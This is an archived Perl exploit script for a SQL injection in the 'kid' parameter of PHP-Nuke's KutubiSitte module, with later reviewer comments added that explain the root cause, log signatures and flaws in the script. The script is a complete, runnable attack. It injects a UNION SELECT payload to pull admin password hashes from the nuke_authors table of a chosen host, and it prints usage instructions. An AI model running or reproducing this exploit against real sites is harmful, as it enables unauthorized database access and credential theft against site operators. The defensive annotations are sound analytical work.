


PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding



PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding
PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding



#!/usr/bin/perl =0D
use Getopt::Std;=0D
use LWP::UserAgent;=0D
=0D
# Print the usage banner for the script.
#
# Takes no arguments. The whole banner is handed to printf as its format
# string; the text contains no % sequences, so it is printed as written.
#
# NOTE(review): the "=0D" at the end of every line of this listing looks like
# quoted-printable residue for a carriage return left by the archive page,
# not part of the original script -- confirm before treating the listing as
# the author's exact text.
sub usg{=0D
printf("=0D
=0D
=0D
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-=0D
   |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |=0D
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-=0D
  #######################################################=0D
  # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #=0D
  #######################################################=0D
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
#:-------------------------------------------------------:#=0D
:#|                    USAGE:                           |#:=0D
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:=0D
#:-------------------------------------------------------:#=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
#:-------------------------------------------------------:#=0D
:#|                   EXAMPLE:                          |#:=0D
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:=0D 
#:-------------------------------------------------------:#=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
=0D
=0D
");=0D
}=0D
# Report failure and stop the script.
#
# Prints the Italian message "SITO NON VULNERABILE" ("site not vulnerable")
# and calls exit() with no argument, so the process ends with status 0;
# the exit code does not distinguish this path from a successful run.
sub problem{=0D
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";=0D
    exit();=0D
}=0D
# Send one crafted GET request to the PHP-Nuke KutubiSitte module and print
# the first hash-like string found in the response body.
#
# Takes no arguments. Reads the package globals $host, $path and $user_id
# (assigned by the option-parsing code at file level) and assigns the globals
# $conn, $query_pwd and $return_pwd; nothing here is declared with `my`.
#
# Defender notes:
#   - Root cause: the `kid` parameter carries "-1" followed by a UNION SELECT
#     over the aid and pwd columns of nuke_authors, filtered on radminsuper.
#     The module's source is not on this page; the payload implies that `kid`
#     reaches an SQL statement without validation. The application-side fix
#     is to cast `kid` to an integer or bind it as a query parameter.
#   - Encoding: %2F%2A%2A%2F decodes to the SQL comment "/**/", used between
#     keywords in place of spaces; the trailing %2F%2A decodes to "/*",
#     presumably to comment out the rest of the module's own query.
#   - Detection: in access logs this is a request to modules.php with
#     name=KutubiSitte, h_op=hadisgoster and a `kid` value containing
#     union/select/nuke_authors. The User-Agent is set to 'Checkbot/0.4 ',
#     but that header is client-controlled, so do not key on it alone.
#   - Response: if such a request returned a hash, treat the nuke_authors
#     credentials as exposed and rotate them.
sub exploitation{=0D
    =0D
    $conn = LWP::UserAgent -> new;=0D
    $conn->agent('Checkbot/0.4 ');=0D
    # Request URL = host + path + the module URL with the injected `kid` value;
    # $user_id is concatenated into the query string as given on the command line.
    $query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";=0D
    # NOTE(review): LWP::UserAgent::get returns an HTTP::Response object for
    # failed requests as well, so this `|| problem()` is not expected to fire
    # on HTTP or network errors; only the regex below decides the outcome.
    $return_pwd = $conn->get($query_pwd) || problem();=0D
    # The class [0-9,a-f] also admits a literal comma and the pattern is
    # unanchored: any 32-character run of digits, commas and a-f in the page
    # matches. A match is not proof that a hash was returned, and reaching
    # problem() is not proof that the site is patched.
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();=0D
    # Prints the captured string; "md5" is the script author's label for it.
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";=0D
   }=0D
=0D
# Script entry point: parse the command line, then either show usage or run.
#
# getopts fills %args from the options -h (host), -p (path) and -U (user id),
# each declared as taking a value. The values are copied into the package
# globals $host, $path and $user_id without any validation; the file shows no
# `use strict` or `use warnings`, so none of these variables is declared.
#
# NOTE(review): the "=0D" line endings look like quoted-printable residue
# from the archive page rather than original source -- confirm.
getopts(":h:p:U:",\%args);=0D
     $host = $args{h} if (defined $args{h});=0D
     $path = $args{p} if (defined $args{p});=0D
     $user_id= $args{U}if (defined $args{U});=0D
     =0D
     # All three options are required: print the banner if any is missing,
     # otherwise issue the request.
     if (!defined $args{h} || !defined $args{p} || !defined $args{U}){=0D
        usg();=0D
     }=0D
     else{=0D
        exploitation();=0D
     }

